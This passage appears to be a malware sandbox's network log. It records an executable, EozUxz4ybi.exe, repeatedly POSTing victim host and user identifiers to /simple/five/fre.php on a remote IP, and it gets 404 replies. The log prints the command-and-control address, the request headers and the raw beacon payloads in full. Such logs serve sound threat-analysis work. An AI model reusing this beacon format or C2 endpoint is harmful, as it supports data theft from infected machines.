                                Jan 11, 2025 01:43:12.528796911 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:13.250133038 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                55192.168.2.85124094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:13.567305088 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:13.572274923 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:14.455693960 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:14 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                56192.168.2.85124194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:14.606277943 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:14.611221075 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:15.317781925 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:15 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                57192.168.2.85124294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:15.463354111 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:15.469660997 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:16.169739962 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                58192.168.2.85124394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:16.333803892 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:16.338866949 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:17.034079075 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                59192.168.2.85124494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:17.180555105 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:17.186517000 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:18.008328915 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:17 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                60192.168.2.85124594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:18.165544033 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:18.171448946 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:18.899002075 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:18 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                61192.168.2.85124694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:19.044585943 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:19.049623966 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:19.775940895 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:19 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                62192.168.2.85124794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:19.930483103 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:19.935375929 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:20.674877882 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:20 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                63192.168.2.85124894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:20.820662022 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:20.826438904 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:21.529187918 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:21 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                64192.168.2.85124994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:21.711738110 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:21.716741085 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:22.418973923 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:22 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                65192.168.2.85125094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:22.573429108 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:22.578330994 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:23.300400972 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:23 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                66192.168.2.85125194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:23.451675892 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:23.456553936 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:24.173432112 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                67192.168.2.85125294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:24.322185993 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:24.327063084 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:25.031737089 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                68192.168.2.85125394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:25.179891109 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:25.184735060 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:25.949522972 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:25 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                69192.168.2.85125494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:26.104372025 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:26.109253883 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:26.814487934 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:26 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                70192.168.2.85125594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:26.974829912 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:26.979790926 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:27.680749893 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:27 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                71192.168.2.85125694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:27.840715885 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:27.847810984 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:28.609339952 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:28 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                72192.168.2.85125794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:28.759398937 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:28.764296055 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:29.581001997 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:29 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                73192.168.2.85125894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:29.737620115 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:29.742691040 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:30.499888897 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:30 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                74192.168.2.85125994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:30.872328997 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:30.877186060 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:31.580795050 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:31 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                75192.168.2.85126094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:31.742301941 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
